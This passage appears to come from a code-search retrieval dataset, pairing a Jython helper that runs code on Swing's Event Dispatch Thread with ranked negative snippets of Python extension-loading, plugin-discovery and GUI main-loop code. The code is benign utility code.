extension.')\n\telse:\n\t\tawait ctx.send('No such extension.')", "def getExtension(self): #$NON-NLS-1$\r", "async def load(self, ctx, *, extension: str):\r\n try:\r\n self.bot.load_extension(extension)\r\n await ctx.send(f\":ok_hand: Loaded module `{extension}`\")\r\n except Exception as e:\r\n await ctx.send(f\":sob: I-I'm sorry, I couldn't load the `{extension}` module >w< \"\r\n + f\"```py\\n{traceback.format_exc()}```\")", "def extension(self):\n return self.extensions[0]", "def findExtensions(self):\n if SYSTEM_EXTENSIONS:\n self._populateExtensions()\n return\n\n pylabs.q.logger.log('Loading pylabs extensions from %s' % self.extensionsRootPath,7)\n\n #Add extensions base dir to sys.path\n sys.path.append(self.extensionsRootPath)\n\n SYSTEM_EXTENSIONS.extend(self.findExtensionInfo())\n\n self._populateExtensions()", "async def tool_load(self, ctx, *, cog: str):\n\n try:\n self.bot.load_extension(cog)\n except Exception as e:\n await zb.bot_errors(ctx,sp.format(e))\n else:\n await ctx.send('**`SUCCESS`**')", "async def extensions(ctx):\n if ctx.invoked_subcommand is None:\n embed = Embed(\n title=\"Extensions\",\n description=\"The following extensions are loaded:\",\n colour=bot.colors['default']\n )\n for k, v in bot.cogs.items():\n embed.add_field(\n name=k,\n value=v.description,\n inline=False)\n await ctx.channel.send(embed=embed)", "def check_if_extension_exists(self, extension):\n cursor = self.conn.cursor()\n cursor.execute(\"SELECT EXISTS(SELECT * FROM pg_extension WHERE extname = %s)\", (extension,))\n self.conn.commit()\n return cursor.fetchone()[0]", "def get_extension(self, extension):\n return self.db.get(extension)", "def test_load(self):\n class TestExtension(Extension):\n pass\n\n self.setup_extension(TestExtension, enable=False)\n\n self.assertEqual(self.manager.get_installed_extensions(),\n [TestExtension])\n self.assertEqual(len(self.manager.get_enabled_extensions()), 0)\n self.assertTrue(hasattr(TestExtension, 'info'))\n self.assertEqual(TestExtension.info.name, self.test_project_name)\n self.assertTrue(hasattr(TestExtension, 'registration'))\n self.assertEqual(TestExtension.registration.name,\n self.test_project_name)", "def load_extensions(self, config):\n loaded_extensions = []\n for extension in self.extensions:\n load_func = getattr(extension, \"load\")\n loaded_extension = load_func(config)\n if loaded_extension:\n loaded_extensions.append(loaded_extension)\n return loaded_extensions", "def _search_for_extension(self, searched_extension: str) -> str:\n for folder in self.folders:\n for extension in folder.get_extensions():\n if searched_extension == extension:\n return str(folder)\n return \"\"", "def iter_extension_paths():\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))", "async def extension_load(self, ctx, extension: str):\n try:\n self.bot.load_extension(extension)\n await ctx.reply(f\"Successful extension loading: `{extension}`\")\n\n except commands.ExtensionNotLoaded:\n ctx.reply(f\"The extension `{extension}` was not found.\")\n\n except commands.ExtensionAlreadyLoaded:\n ctx.reply(f\"The extension `{extension}` is already loaded.\")\n\n except Exception:\n file = discord.File(io.StringIO(traceback.format_exc()), filename=f\"{extension}.txt\")\n await ctx.send(f\"extension loading fail: `{extension}`\", file=file)", "def get_required_extensions(self):\n return []", "def _add_extensions(self):\n ext_cache_down = 'cache_downloading'\n ext_cache_up = 'cache_uploading'\n cmd_args = self.task_data.get('cmd_args', {})\n if not isinstance(cmd_args, dict):\n cmd_args = {}\n if cmd_args.get('save_raw_pages', False):\n self.required_signals[SIGNAL_SPIDER_OPENED]['wait'] += \\\n EXTENSION_SIGNALS[ext_cache_up]\n if cmd_args.get('load_raw_pages'):\n self.required_signals[SIGNAL_SCRIPT_CLOSED]['wait'] += \\\n EXTENSION_SIGNALS[ext_cache_down]", "def findModule(name):", "def extensions(self, global_step):\n return []", "def extensions(self, global_step):\n return []", "def _load_extensions(path):\n extension_dir = os.environ.get(path, path)\n print(f\"looking for extensions in {extension_dir}\")\n if not os.path.isdir(extension_dir):\n print(f\"No such {extension_dir}\")\n return\n\n import sys \n import importlib\n\n sys.path.append(path)\n imports = [ filename \n for filename in os.listdir(path)\n if not filename.startswith('__') \n and not filename.startswith('.') \n ]\n for filename in imports:\n module_name, _ = os.path.splitext(filename)\n module = importlib.import_module(module_name)\n for attribute_name in dir(module):\n if attribute_name.startswith('__'):\n continue\n globals()[attribute_name] = getattr(module, attribute_name)", "def get(self, name):\n ext = self.extensions.get(name)\n\n if not ext:\n ext = self.builtin(name)\n\n if not ext:\n self.discover()\n\n try:\n ext = self.extensions[name]\n except KeyError:\n raise InternalError(\"Unknown '{}' extension '{}'\"\n .format(self.type_, name))\n return ext", "def getAssetExtension(asset, extension):\n\n if asset.get('extensions') == None:\n return None\n\n return asset['extensions'].get(extension)", "def load_clis(namespace='softboxen.cli'):\n LOG.debug('searching namespace %s', namespace)\n\n extensions = {\n entry_point.name: entry_point.load()\n for entry_point\n in pkg_resources.iter_entry_points(namespace)\n }\n\n discovered_clis = []\n\n for identity, impl in extensions.items():\n if not issubclass(impl, base.CommandProcessor):\n LOG.warning('ignoring non-compliant implementation %s', identity)\n continue\n\n LOG.debug('found extension module %s for vendor %s, model %s, '\n 'version %s', impl, impl.VENDOR, impl.MODEL, impl.VERSION)\n\n discovered_clis.append(impl)\n\n return discovered_clis", "def extension(self) -> str:", "def test_get_extension(self):\n\n spec = {\n \"$ext\": {\n \"function\": \"operator:add\",\n }\n }\n\n validate_extensions(spec, None, None)", "async def load_all_extensions(self, reload=False):\n succeeded = {}\n for extension in get_extensions():\n try:\n if reload or extension not in self.cogs_loaded:\n self.load_extension(f'cogs.{extension}')\n l.info(f\"Loaded extension '{extension}'\")\n self.cogs_loaded.add(extension)\n succeeded[extension] = True\n except Exception as e:\n error = f\"{extension}\\n {type(e).__name__} : {e}\"\n l.error(f\"Failed to load extension '{error}'\")\n succeeded[extension] = False\n if succeeded:\n l.info(LOG_SEP)\n return succeeded", "def _find_extension(pth):\n for i, hdu in enumerate(pth):\n if hdu.header.get('PIXTYPE') == 'HEALPIX':\n return i\n else:\n raise IndexError(\"No HEALPIX extensions found in %s\" % pth.filename())", "def find_by_extension(extension):\n for format in FORMATS:\n if extension in format.extensions:\n return format\n\n raise UnknownFormat('No format found with extension \"%s\"' % extension)", "async def load_cog(self, ctx, *, cog: str):\n\n try:\n self.bot.load_extension(cog)\n except Exception as e:\n await ctx.send(f'**`ERROR:`** {type(e).__name__} - {e}')\n else:\n await ctx.send('**`SUCCESS`**')", "def load_extensions(self, *exts):\n for ext in exts:\n try:\n self.load_extension(ext)\n logger.info(f\"Successfully loaded cog {ext}.\")\n except Exception:\n logger.error(f\"Failed to load cog: {ext}: {format_exc()}\")\n\n logger.info(\"Cog loading complete.\")", "def getExtension(path: unicode, extLevel: int) -> unicode:\n ...", "def __load_cogs(self):\n for cog in self.__cogs.get():\n logging.info('loading %s', cog)\n self.load_extension(cog)", "async def load_all_extensions(self):\n await self.wait_until_ready()\n await asyncio.sleep(1)\n\n cogs = [\"cogs.member\",\n \"cogs.officer\",\n \"cogs.rolemanager\",\n \"cogs.database\",\n \"cogs.everyone\",\n \"cogs.nodewar\",\n \"cogs.twitch\"]\n\n for extension in cogs:\n try:\n self.load_extension(extension)\n print(f'loaded {extension}')\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'failed to load extension {error}')\n print('-' * 10)\n\n for guild in self.guilds:\n if not discord.utils.get(guild.roles, name=self.manager_role):\n await self.create_bot_manager(guild)\n\n print(f\"\\nUsername: {self.user}\\nID: {self.user.id}\")", "async def load_cog(self, ctx, *, cog: str):\n\n try:\n await self.bot.load_extension(f'cogs.{cog}')\n except Exception as e:\n await ctx.send(f'**`ERROR:`** {type(e).__name__} - {e}')\n else:\n await ctx.send('**`SUCCESS`**')", "def test_get_built_in_extension(self):\n\n spec = {\n '$ext': {\n \"function\": \"random_string\",\n \"extra_args\": [4]\n }\n }\n\n validate_extensions(spec, None, None)", "def _find_extension(self, ext_type, types, values):\n counter = 0\n # For the APLN extension, grab the value in ASCII.\n if ext_type == b\"\\x00\\x10\":\n while counter < len(types):\n if types[counter] == ext_type:\n return ((values[counter][3:]).decode())\n counter += 1\n else:\n while counter < len(types):\n if types[counter] == ext_type:\n return values[counter].hex()\n counter += 1\n\n return \"\"", "def test_register_with_another_extension(self):\n DummyLoader.register()\n DummyLoader.register(extensions=('.example2',))\n self.assertIs(getattr(sys, HOOK_NAME)['.example2'], DummyLoader)", "def __getitem__(self, name):\r\n if self._extensions_by_name is None:\r\n d = {}\r\n for e in self.extensions:\r\n d[e.name] = e\r\n self._extensions_by_name = d\r\n return self._extensions_by_name[name]", "def get_extension(self) -> Optional[str]:\n return self.extension", "def get_matched_extensions(request):\n\n def _match(e):\n return e.obj if e.obj.matches(request) else None\n\n result = EXTENSION_MANAGER.map(_match)\n return filter(bool, result)", "def find(self):\n extension_hooks = list()\n eggs = find_eggs(self.rootDir)\n factory = EggPMExtensionFactory()\n for egg in eggs:\n # Add egg to path so other parts of pylabs can import its contents\n eggfile = egg.location\n sys.path.append(eggfile)\n for filePointer, path in self._generateExtensionConfigFilePointers(eggfile):\n inifile = pylabs.inifile.IniFile(filePointer)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def _parse_extensions(self):\n for root in self.roots:\n for extensions in root.iter('extensions'):\n for extension in extensions.iter('extension'):\n extension_name = extension.attrib.get('name', '')\n #print(f'Extension: {extension_name}')\n self.extensions.append(extension_name)\n\n extension_apis = extension.attrib.get('supported', '')\n extension_api_list = set(extension_apis.split('|'))\n\n # filter by api\n if 'gl' not in extension_apis:\n continue\n\n for require in extension.iter('require'):\n for enum in require.iter('enum'):\n enum_name = enum.attrib.get('name', '')\n self.enum_list.append(enum_name)\n self.enum_required_by_extension[enum_name].append({\n \"name\": extension_name,\n \"api_list\": extension_api_list})\n for command in require.iter('command'):\n command_name = command.attrib['name']\n self.command_list.append(command_name)\n self.command_required_by_extension[command_name].append({\n \"name\": extension_name,\n \"api_list\": extension_api_list})", "async def extension_reload_all(self, ctx):\n msg = []\n\n ext = self.bot.extensions.copy()\n\n for extension in ext:\n try:\n self.bot.reload_extension(extension)\n msg.append(f\"Successfully reloading: `{extension}`\")\n\n except commands.ExtensionNotFound:\n msg.append(f\"The extension `{extension}` was not found.\")\n\n except Exception:\n msg.append(f\"extension load fail: `{extension}`\")\n file = discord.File(io.StringIO(traceback.format_exc()), filename=f\"{extension}.txt\")\n await ctx.reply(file=file)\n\n msg.append(f\"\\nloaded extensions: {len(self.bot.extensions)}/{len(ext)}\")\n await ctx.reply(\"\\n\".join(msg))", "def load_extension(self, name):\n if name in self.__extensions.loaded_by_core:\n raise commands.ExtensionAlreadyLoaded(name)\n try:\n cog_module = importlib.import_module(f'extensions.{name}.cogs')\n except ImportError:\n cog_module = importlib.import_module(f'hero.extensions.{name}.cogs')\n\n self.__settings[name] = self.__extensions[name].get_settings(self)\n self.__controllers[name] = self.__extensions[name].get_controller(self)\n\n if hasattr(cog_module, 'setup'):\n cog_module.setup(self, name)\n else:\n cog_classes = inspect.getmembers(cog_module, lambda member: isinstance(member, type) and\n issubclass(member, hero.Cog) and member is not hero.Cog)\n for _, _Cog in cog_classes:\n if _Cog is None:\n raise ImportError(f\"The {name} extension's cog module didn't have \"\n f\"any Cog subclass and no setup function\")\n self.add_cog(_Cog(self, self.__extensions[name]))\n\n self.__extensions.loaded_by_core.append(name)\n return cog_module", "def search_registry(filename):\n for converter in data_importers:\n if converter.check_importable(filename):\n return converter\n logging.error('No converter found', filename)\n return False", "def getExtension(self, *args):\n return _libsbml.SBMLExtensionRegistry_getExtension(self, *args)", "def discover(self, name=None):\n for obj in iter_entry_points(group=self.group, name=name):\n ext = _Extension(self.type_, obj)\n self.extensions[ext.name] = ext", "def SearchFileType(ext, message0 = \"\", message1 = \"\", message2 = \"\"):\n extList = glob.glob('*'+ext)\n ChooseNumOption(extList, \"file\", ext, message0, message1, message2, True)", "def imp_find_dotted_module(name):\n path = None\n for x in name.split('.'):\n result = imp.find_module(x, path)\n path = [result[1]]\n return result", "def imp_find_dotted_module(name):\n path = None\n for x in name.split('.'):\n result = imp.find_module(x, path)\n path = [result[1]]\n return result", "def _load_library_extensions():\n group = 'helga_handlers'\n entry_points = pkg_resources.iter_entry_points(group=group)\n plugins = []\n for ep in entry_points:\n try:\n logger.debug('loading entry_point %s' % ep.name)\n plugin = ep.load()\n plugin._helga_name_ = ep.name\n plugins.append(plugin)\n except Exception as error:\n logger.error(\"Error initializing plugin %s: %s\" % (ep, error))\n return plugins", "def get_pending_ext(confirm_auth):\n extension = _PENDING % confirm_auth\n return extension", "def scan_plugin(self):\n pluginpath=_module_path()\n plugins=[]\n for f in os.listdir(pluginpath):\n if os.path.isfile(os.path.join(pluginpath,f)) and os.path.splitext(os.path.join(pluginpath,f))[-1]=='.py' :\n if 'plugin_' in os.path.basename(f):\n logger.debug(\"found plugin : %s\",f)\n plugins.append(f)\n return plugins", "def init_extensions(self, package, module):\n\n pass", "def get_supported_extensions(ext=\".as\"):\n result = list(ext + x for x in LOADERS.keys())\n result.append(ext)\n return result", "def get_extension(self) -> str:\n return self._extension", "def request_plugins(self):", "def list_extensions(self, **_params):\r\n return self.get(self.extensions_path, params=_params)", "def get_startup_extensions(self):\n final_list = []\n for entry in self.bot_data_file[\"startup_extensions\"]:\n final_list.append(str(entry[\"name\"]))\n return final_list", "def __find_eligible_plugins_in_directory(cls, directory_to_search):\n\n plugin_files = [\n x\n for x in os.listdir(directory_to_search)\n if x.endswith(\".py\") and x[0:-3] != \"__init__\"\n ]\n return plugin_files", "def is_extension_supported(request, extension_alias):\n extensions = list_extensions(request)\n for extension in extensions:\n if extension['alias'] == extension_alias:\n return True\n else:\n return False", "def find_plugins():\n return list(straight.plugin.load('csbot.plugins', subclasses=Plugin))", "def check_extensions(self):\n extensions = self.cloud.get_network_extensions()\n for network_extension in self.neutron_extensions:\n if network_extension not in extensions:\n LOGGER.warning(\n \"Cannot find Neutron extension: %s\", network_extension)\n self.is_skipped = True\n break", "def test_get_enabled_extensions_returns_empty(self):\n self.manager = TestExtensionManager([], '')\n self.manager.load()\n\n self.assertEqual(len(self.manager.get_enabled_extensions()), 0)", "def test_badge_should_have_extensions(self):\n\n badge = self.get_sample_badge()\n self.assertTrue(hasattr(badge, 'extensions'))", "def load_ep(entry_point):\n logger.debug('Loading extension: %s', entry_point)\n try:\n func = entry_point.load()\n func()\n except Exception as e:\n msg = (f\"Numba extension module '{entry_point.module}' \"\n f\"failed to load due to '{type(e).__name__}({str(e)})'.\")\n warnings.warn(msg, stacklevel=3)\n logger.debug('Extension loading failed for: %s', entry_point)", "def search_ext(self,strz):\n\t\tfor ext in file_type:\t#file_type = list of allow extension words\n\t\t\tif strz.endswith(ext):\n\t\t\t\tself.extension=ext\n\t\t\t\treturn strz.replace(ext,\"\")\n\t\treturn strz", "def show_extension(self, ext_alias, **_params):\r\n return self.get(self.extension_path % ext_alias, params=_params)", "async def _reload(self, ctx, *, module: str=None):\n if module is None or module == \"all\":\n await ctx.message.add_reaction('\\N{HOURGLASS}')\n try:\n for extension in startup_extensions:\n self.bot.unload_extension(extension)\n self.bot.load_extension(extension)\n except Exception as e:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{CROSS MARK}')\n await ctx.send('{}: {}'.format(type(e).__name__, e))\n traceback.print_exc()\n else:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{WHITE HEAVY CHECK MARK}')\n else:\n await ctx.message.add_reaction('\\N{HOURGLASS}')\n try:\n self.bot.unload_extension(module)\n self.bot.load_extension(module)\n except Exception as e:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{CROSS MARK}')\n await ctx.send('{}: {}'.format(type(e).__name__, e))\n traceback.print_exc()\n else:\n await ctx.message.remove_reaction('\\N{HOURGLASS}', ctx.me)\n await ctx.message.add_reaction('\\N{WHITE HEAVY CHECK MARK}')", "def ext(self):\n return self._getbyspec(\"ext\")[0]", "def find(self, egg):", "def search(cls, name, lookup=[]):\r\n if os.path.isfile(name): return name\r\n for spath in lookup:\r\n fname = os.path.join(spath, name)\r\n if os.path.isfile(fname):\r\n return fname\r\n for ext in cls.extensions:\r\n if os.path.isfile('%s.%s' % (fname, ext)):\r\n return '%s.%s' % (fname, ext)", "def find_related_module(app, related_name):\n\n try:\n app_path = importlib.import_module(app).__path__\n except ImportError as exc:\n warn('Autodiscover: Error importing %s.%s: %r' % (\n app, related_name, exc,\n ))\n return\n except AttributeError:\n return\n\n try:\n f, _, _ = imp.find_module(related_name, app_path)\n # f is returned None when app_path is a module\n f and f.close()\n except ImportError:\n return\n\n return importlib.import_module('{0}.{1}'.format(app, related_name))", "def load(self, name, ignore=True):\n\n # ignore if extension is already loaded\n if name in self.extension:\n return True\n\n loaded = False\n debug('attempting to load extension: {}', name)\n try:\n try:\n plugin = import_module(name)\n except RelengModuleNotFoundError:\n # python 2.7 may not be able to load from a nested path; try\n # searching through each package (if a nested module)\n if sys.version_info >= (3, 0) or '.' not in name:\n raise\n\n # split the module into parts and for each part, check to see\n # if it's a package directory; if so, keep going until the last\n # namespace package\n ext_parts = name.split('.')\n path = None\n last_part = ''\n for part in ext_parts[:-1]:\n file, pathname, desc = imp.find_module(part, path)\n\n if desc[-1] != imp.PKG_DIRECTORY:\n raise ImportError(name)\n\n part = last_part + part\n last_part = part + '.'\n\n pkg = sys.modules.get(part, None)\n if not pkg:\n try:\n pkg = imp.load_module(part, file, pathname, desc)\n finally:\n if file:\n file.close()\n path = pkg.__path__\n else:\n path = [pathname]\n\n # with the path of the last namespace package found, find the\n # desired module in this path\n last_part = ext_parts[-1]\n file, pathname, desc = imp.find_module(last_part, path)\n\n plugin = sys.modules.get(name, None)\n if not plugin:\n try:\n plugin = imp.load_module(name, file, pathname, desc)\n finally:\n if file:\n file.close()\n\n if hasattr(plugin, 'releng_setup'):\n if not ignore:\n plugin.releng_setup(self)\n loaded = True\n else:\n try:\n plugin.releng_setup(self)\n loaded = True\n except RelengInvalidSetupException as e:\n warn('extension is not supported '\n 'due to an invalid setup: {}\\n'\n ' ({})', name, e)\n except RelengVersionNotSupportedException as e:\n warn('extension is not supported '\n 'with this version: {}\\n'\n ' ({})', name, e)\n\n if loaded:\n self.extension.append(name)\n verbose('loaded extension: {}', name)\n loaded = True\n else:\n warn('extension does not have a setup method: {}', name)\n except RelengModuleNotFoundError:\n warn('unable to find extension: {}', name)\n\n return loaded", "async def reload(self, ctx, name: str):\n try:\n self.bot.reload_extension(f\"cogs.{name}\")\n except Exception as e:\n return await ctx.send(default.traceback_maker(e))\n await ctx.send(f\"{emote.check} | Reloaded extension **{name}**\")", "def find_xontrib(name):\n if name.startswith(\".\"):\n spec = importlib.util.find_spec(name, package=\"xontrib2\")\n else:\n spec = importlib.util.find_spec(\".\" + name, package=\"xontrib2\")\n return spec or importlib.util.find_spec(name)", "def CompExtension_getPackageName():\n return _libsbml.CompExtension_getPackageName()", "def reload_cogs(self):\n\n for extension in list(self.extensions):\n try:\n self.reload_extension(extension)\n except errors.NoEntryPointError:\n log.info(\"The extension {extension} has no setup function\")\n pass\n except errors.ExtensionAlreadyLoaded:\n pass\n\n log.info(f\"Reloaded {len(self.extensions)} cogs\")", "def __getitem__(self, addonName):\r\n if self.__contains__(addonName):\r\n return self.addons[addonName]\r\n raise AddonError, \"Addon %s does not exist\" % addonName", "def defaultExtension(self):\n result = self.EXTERNAL_TYPES[self.typ]\n if not self.fileExtensions:\n return result\n if result in self.fileExtensions:\n return result\n return self.fileExtensions[0]", "def get_available_extensions() -> DefaultDict[str, Type]:\n all_extensions:DefaultDict[str, Type] = defaultdict(lambda:False)\n for current_class in Content.__subclasses__():\n for extension in current_class.extensions:\n all_extensions[extension] = current_class\n return all_extensions", "def _scan_for_service_extensions_under_code_container(self, container):\n extcoll = collect_extensions_under_code_container(container, UpnpServiceProxy)\n for _, extcls in extcoll:\n if (hasattr(extcls, \"SERVICE_MANUFACTURER\") and hasattr(extcls, \"SERVICE_TYPE\")):\n svc_manufacturer = getattr(extcls, \"SERVICE_MANUFACTURER\")\n svc_type = getattr(extcls, \"SERVICE_TYPE\")\n extkey = generate_extension_key(svc_manufacturer, svc_type)\n self._register_service(extkey, extcls)\n return", "def _find_mod(self, item, match_only=False):\n for iface in self._scan:\n for bname in self._scan[iface]:\n if os.path.basename(bname) == item:\n self._load_item(iface, bname)\n if item in self._loaded:\n return self._loaded[item]\n if not match_only:\n for iface in self._scan:\n for bname in self._scan[iface]:\n if self._scan[iface][bname].get(\"loaded\"):\n continue\n self._load_item(iface, bname)\n if item in self._loaded:\n return self._loaded[item]\n # Let's see if the module being lookup is in the load errors dictionary\n if item in self._load_errors:\n # Return the LoadError\n return self._load_errors[item]", "def _get_info(self, fullmodname):\n parts = fullmodname.split('.')\n submodname = parts[-1]\n modpath = '/'.join(parts)\n for suffix, is_package in _SEARCH_ORDER:\n relpath = modpath + suffix\n try:\n self.datablocks[relpath]\n except KeyError:\n pass\n else:\n return submodname, is_package, relpath\n msg = ('Can\\'t find module %s in .blend %r' %\n (fullmodname, self.path_entry))\n ##logging.debug(msg)\n raise BlendImportError(msg)", "def get_ext(self, name):\n # Optimizations to reduce attribute accesses\n m2x509_get_ext = m2.x509_get_ext\n m2x509_extension_get_name = m2.x509_extension_get_name\n x509 = self.x509\n \n for i in range(m2.x509_get_ext_count(x509)):\n extPtr = m2x509_get_ext(x509, i)\n if m2x509_extension_get_name(extPtr) == name:\n return X509_Extension(extPtr, _pyfree=0)\n\n raise LookupError", "def _get_extension_resource(api_root):\n # TODO: Cache this. We only use this resource as a link to sub-resources.\n return api_root.get_extension(\n extension_name='reviewbotext.extension.ReviewBotExtension')", "def _find_pricing_script(self, script_tag):\n find = False\n counter = -1\n while not find:\n counter += 1\n try:\n script_text = script_tag[counter].text\n except:\n print(\n 'WARNING: Could not find the script section with price history, check web address and/or '\n 'scraping mechanism.')\n\n if 'Price, USD' in script_text:\n find = True\n\n return script_text", "def list_phonebooks(path=\".\"):\n files = os.listdir(path)\n for file in files:\n if file.endswith(EXTENSION):\n print file", "def extensions(self):\n return self.properties.get('extensions',\n EntityCollection(self.context, Extension,\n ResourcePath(\"extensions\", self.resource_path)))", "def find_extensions(self, cls, cardinality, mace_time=60):\n n = self.cardinality\n ne = ['c'+str(x)+'!=c'+str(y) for x in range(n) for y in range(x+1,n)]\n return prover9(cls.axioms+ne+self.positive_diagram('c'), [], \n mace_time,0,cardinality)", "def extensions(self):\n raise NotImplementedError()", "def test_load_with_enabled_by_default(self):\n class TestExtension(Extension):\n pass\n\n self.setup_extension(TestExtension, enable=False)\n\n self.assertEqual(self.manager.get_installed_extensions(),\n [TestExtension])\n\n enabled_extensions = self.manager.get_enabled_extensions()\n self.assertEqual(len(enabled_extensions), 1)\n self.assertIsInstance(enabled_extensions[0], TestExtension)\n\n self.assertTrue(hasattr(TestExtension, 'info'))\n self.assertEqual(TestExtension.info.name, self.test_project_name)\n self.assertIsNotNone(TestExtension.instance)\n self.assertTrue(hasattr(TestExtension, 'registration'))\n self.assertEqual(TestExtension.registration.name,\n self.test_project_name)\n self.assertTrue(TestExtension.registration.enabled)", "def get_optional_extensions(self):\n return []", "def extensions(self):\n return list(self._list(extension.Extension, paginated=False))", "def test_19_file_extensions_within_type(self):\n print (self.test_19_file_extensions_within_type.__doc__)\n\n stats_maker = StatsMakerFiles()\n r = stats_maker.view_file_extensions_within_type(file_type=FILE_TYPE_OCTET_STREAM)\n\n num_unique_extensions = r.result_data.get('number_unique_extensions')\n\n # check number of extensions\n #\n self.assertEqual(num_unique_extensions, 67)\n\n # check that list length matches number of extensions\n #\n ext_counts = r.result_data.get('records', [])\n self.assertEqual(len(ext_counts), 67)\n\n print ('ext_counts', ext_counts[4])\n # check 5th listing in extension count list\n #\n listing_5 = OrderedDict([('extension', u'.docx'), ('count', 15), ('total_count', 437), ('percent_string', '3.432%')])\n\n self.assertEqual(listing_5, ext_counts[4])" ]
[ "0.6085889", "0.60732716", "0.60676134", "0.6062981", "0.5867079", "0.5847451", "0.58071655", "0.57089275", "0.56770766", "0.5671906", "0.56402373", "0.5582146", "0.5570287", "0.5542473", "0.5539861", "0.5514397", "0.549309", "0.54413986", "0.5440934", "0.5427723", "0.5409136", "0.54011464", "0.5365408", "0.5365408", "0.53493196", "0.5347066", "0.5336513", "0.53349745", "0.53344864", "0.53344667", "0.53091526", "0.5290738", "0.52905625", "0.5287208", "0.52836615", "0.52730733", "0.5271734", "0.5251521", "0.52515167", "0.5237998", "0.52268386", "0.51758915", "0.5159194", "0.5158534", "0.5150624", "0.5145897", "0.513017", "0.51296276", "0.51200074", "0.5108832", "0.50879115", "0.50784034", "0.50778604", "0.5074822", "0.5074822", "0.50641656", "0.5058123", "0.50565994", "0.5052455", "0.50177574", "0.50094175", "0.5000893", "0.5000507", "0.49993044", "0.4994558", "0.4983155", "0.49731967", "0.4960678", "0.49563998", "0.49498144", "0.49452302", "0.4941237", "0.49406964", "0.49339858", "0.49315944", "0.49187443", "0.49161315", "0.49135935", "0.48952958", "0.48912594", "0.4890105", "0.48886514", "0.488671", "0.48843768", "0.48774952", "0.4874218", "0.48697656", "0.4863722", "0.485543", "0.4853677", "0.48534262", "0.4853042", "0.48445448", "0.484232", "0.48403", "0.48343495", "0.48301816", "0.4819524", "0.4814921", "0.48104823" ]
0.5237927
40
Will detect and then run the codeblock on the EDT
def genericSwingEDTRunner(ifOffEDTThenRunNowAndWait, ifOnEDTThenRunNowAndWait, codeblock, *args): isOnEDT = SwingUtilities.isEventDispatchThread() # myPrint("DB", "** In .genericSwingEDTRunner(), ifOffEDTThenRunNowAndWait: '%s', ifOnEDTThenRunNowAndWait: '%s', codeblock: '%s', args: '%s'" %(ifOffEDTThenRunNowAndWait, ifOnEDTThenRunNowAndWait, codeblock, args)) myPrint("DB", "** In .genericSwingEDTRunner(), ifOffEDTThenRunNowAndWait: '%s', ifOnEDTThenRunNowAndWait: '%s', codeblock: <codeblock>, args: <args>" %(ifOffEDTThenRunNowAndWait, ifOnEDTThenRunNowAndWait)) myPrint("DB", "** In .genericSwingEDTRunner(), isOnEDT:", isOnEDT) class GenericSwingEDTRunner(Runnable): def __init__(self, _codeblock, arguments): self.codeBlock = _codeblock self.params = arguments def run(self): myPrint("DB", "** In .genericSwingEDTRunner():: GenericSwingEDTRunner().run()... about to execute codeblock.... isOnEDT:", SwingUtilities.isEventDispatchThread()) self.codeBlock(*self.params) myPrint("DB", "** In .genericSwingEDTRunner():: GenericSwingEDTRunner().run()... finished executing codeblock....") _gser = GenericSwingEDTRunner(codeblock, args) if ((isOnEDT and not ifOnEDTThenRunNowAndWait) or (not isOnEDT and not ifOffEDTThenRunNowAndWait)): myPrint("DB", "... calling codeblock via .invokeLater()...") SwingUtilities.invokeLater(_gser) elif not isOnEDT: myPrint("DB", "... calling codeblock via .invokeAndWait()...") SwingUtilities.invokeAndWait(_gser) else: myPrint("DB", "... calling codeblock.run() naked...") _gser.run() myPrint("DB", "... finished calling the codeblock via method reported above...")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run(self):\n self.window.mainloop()", "def takeControl(self):\n mainloop()", "def takeControl(self):\n mainloop()", "def exec(self):\n if self._root.master is None:\n self._root.mainloop()", "def run(self):\n self.ident = threading.current_thread().ident\n self.ready.set()\n self.exec_()", "def run():\n gui = GUI()\n gui.mainloop()", "def run(self):\n\t\tgtk.gdk.threads_init()\t\t\t# (!) important for multi-threading to work with GTK+\n\t\tself.__update_timer = gobject.timeout_add(250, self.__update, self)\n\t\tself.statusbar1.push(0, \"Ready (for about dialog; right-click to lower right corner).\")\n\t\tgtk.main()", "def run(self):\n\n while not self.done:\n\n self.event_loop()\n\n self.update()", "def mainloop(self):\n self.root.mainloop()", "def mainloop(self):\n self.root.mainloop()", "def exec(self):\n self._root.after(100, self.change_state, States.INITIAL) # enter the state once gui is setup\n super().exec()", "def loop_run(self):\n super(EventLoop, self).loop_run()\n self.inq = self.cothread.EventQueue()", "def mainloop(self):\n self.master.mainloop()", "def execute_block_now(event):\n b = event.cli.current_buffer\n b.validate_and_handle()", "def main(self):\n self.root.mainloop()", "def run(self):\n if self.okay:\n ExtLoopWin32.run()", "def mainloop(self):\n\t\tself.root.after(100, self.tkloop)\n\t\tself.root.mainloop()", "def run_main_loop():\n mainloop = GObject.MainLoop()", "def run(self):\n self.cmdloop()", "def main(self):\n self.validate()\n self.root.mainloop()", "def dispatch_loop(self):\n pass", "def mainloop(self):\r\n self.bindHotkeys()\r\n self.root.mainloop()", "def run(self):\n GLib.MainLoop().run()", "def run(self):\n self.run()", "def block(self):\n pass", "def exec(self) -> bool:\n return bool(self._widget._mgui_exec())", "def run(self):\n self.monitorTextBox.setPlainText(\"\")\n self.applyChanges()\n self.toolBox.setCurrentIndex(4)\n if self.dat.surrogateProblem == None:\n return\n tool = self.toolSelectBox.currentText()\n pg = self.dat.surrogateMethods.plugins[tool].surrogateMethod(self.dat)\n pg.loadDict(self.dat.surrogateProblem[tool])\n pg.start()\n self.pg = pg\n self.a = True\n self.timer.start(self.updateDelay)\n self.timeRunning = time.time()\n self.runButton.setEnabled(False)\n self.stopButton.setEnabled(True)\n self.setStatusBar.emit(\"Surrogate Generation Running\")", "def _run(self):\n while(self._loop):\n pass", "def _run_delayed_gui_load_code(self):\n #Stop the timer.\n self._delayed_gui_timer.stop()\n print(f'_run_delayed_gui_load_code() called!')\n # Try to select the first combo item after they've loaded\n self.ui.contextSelectorWidget._trySelectFirstComboItem()", "def block(self):\n # I WILL RUN FOR EVER \n # BUT WHY ARE YOU 